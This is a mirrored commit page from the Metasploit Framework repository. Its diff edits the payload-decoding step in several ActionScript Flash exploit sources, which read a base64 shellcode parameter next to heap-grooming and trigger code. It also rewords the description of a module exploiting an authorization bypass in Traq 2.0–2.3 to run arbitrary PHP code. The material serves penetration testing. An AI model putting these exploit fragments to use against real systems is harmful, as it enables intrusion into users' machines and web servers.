mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-09-04 20:18:27 +02:00
Solve conflics
This commit is contained in:
commit
e9714bfc82
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@ -27,7 +27,10 @@ package
|
|||||||
public function Main()
|
public function Main()
|
||||||
{
|
{
|
||||||
var b64:Base64Decoder = new Base64Decoder()
|
var b64:Base64Decoder = new Base64Decoder()
|
||||||
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
|
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
|
||||||
|
var pattern:RegExp = / /g;
|
||||||
|
b64_payload = b64_payload.replace(pattern, "+")
|
||||||
|
b64.decode(b64_payload)
|
||||||
var payload:String = b64.toByteArray().toString()
|
var payload:String = b64.toByteArray().toString()
|
||||||
|
|
||||||
for (i = 0; i < bv.length; i++) {
|
for (i = 0; i < bv.length; i++) {
|
||||||
|
@ -32,9 +32,11 @@ package
|
|||||||
var i:uint = 0
|
var i:uint = 0
|
||||||
var j:uint = 0
|
var j:uint = 0
|
||||||
|
|
||||||
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
|
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
|
||||||
payload = b64.toByteArray().toString();
|
var pattern:RegExp = / /g;
|
||||||
|
b64_payload = b64_payload.replace(pattern, "+")
|
||||||
|
b64.decode(b64_payload)
|
||||||
|
payload = b64.toByteArray().toString()
|
||||||
for (i = 0; i < defrag.length; i++) {
|
for (i = 0; i < defrag.length; i++) {
|
||||||
defrag[i] = new ByteArray()
|
defrag[i] = new ByteArray()
|
||||||
defrag[i].length = BYTE_ARRAY_SIZE
|
defrag[i].length = BYTE_ARRAY_SIZE
|
||||||
|
@ -42,8 +42,11 @@ package
|
|||||||
this.object_vector_length = 5770 * 2
|
this.object_vector_length = 5770 * 2
|
||||||
this.byte_array_vector_length = 510 * 2
|
this.byte_array_vector_length = 510 * 2
|
||||||
|
|
||||||
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
|
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
|
||||||
payload = b64.toByteArray().toString();
|
var pattern:RegExp = / /g;
|
||||||
|
b64_payload = b64_payload.replace(pattern, "+")
|
||||||
|
b64.decode(b64_payload)
|
||||||
|
payload = b64.toByteArray().toString()
|
||||||
|
|
||||||
this.initialize_worker_and_ba()
|
this.initialize_worker_and_ba()
|
||||||
if (!this.trigger())
|
if (!this.trigger())
|
||||||
|
@ -39,7 +39,10 @@ public class Main extends Sprite
|
|||||||
|
|
||||||
private function mainThread():void
|
private function mainThread():void
|
||||||
{
|
{
|
||||||
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
|
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
|
||||||
|
var pattern:RegExp = / /g;
|
||||||
|
b64_payload = b64_payload.replace(pattern, "+")
|
||||||
|
b64.decode(b64_payload)
|
||||||
payload = b64.toByteArray().toString()
|
payload = b64.toByteArray().toString()
|
||||||
|
|
||||||
ba.length = 0x1000
|
ba.length = 0x1000
|
||||||
|
@ -43,7 +43,10 @@ package
|
|||||||
|
|
||||||
private function mainThread():void
|
private function mainThread():void
|
||||||
{
|
{
|
||||||
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
|
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
|
||||||
|
var pattern:RegExp = / /g;
|
||||||
|
b64_payload = b64_payload.replace(pattern, "+")
|
||||||
|
b64.decode(b64_payload)
|
||||||
payload = b64.toByteArray().toString()
|
payload = b64.toByteArray().toString()
|
||||||
ba.length = 0x1000
|
ba.length = 0x1000
|
||||||
ba.shareable = true
|
ba.shareable = true
|
||||||
|
@ -17,12 +17,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||||||
This module exploits an arbitrary command execution vulnerability in
|
This module exploits an arbitrary command execution vulnerability in
|
||||||
Traq 2.0 to 2.3. It's in the admincp/common.php script.
|
Traq 2.0 to 2.3. It's in the admincp/common.php script.
|
||||||
|
|
||||||
This function is called in each script located into /admicp/ directory to
|
This function is called in each script located in the /admicp/ directory to
|
||||||
make sure the user has admin rights, but this is a broken authorization
|
make sure the user has admin rights. This is a broken authorization schema
|
||||||
schema due to the header() function doesn't stop the execution flow. This
|
because the header() function doesn't stop the execution flow.
|
||||||
can be exploited by malicious users to execute admin functionality resulting
|
This can be exploited by malicious users to execute admin functionality,
|
||||||
for e.g. in execution of arbitrary PHP code leveraging of plugins.php
|
e.g. execution of arbitrary PHP code leveraging of plugins.php functionality.
|
||||||
functionality.
|
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' =>
|
'Author' =>
|
||||||
|
Loading…
Reference in New Issue
Block a user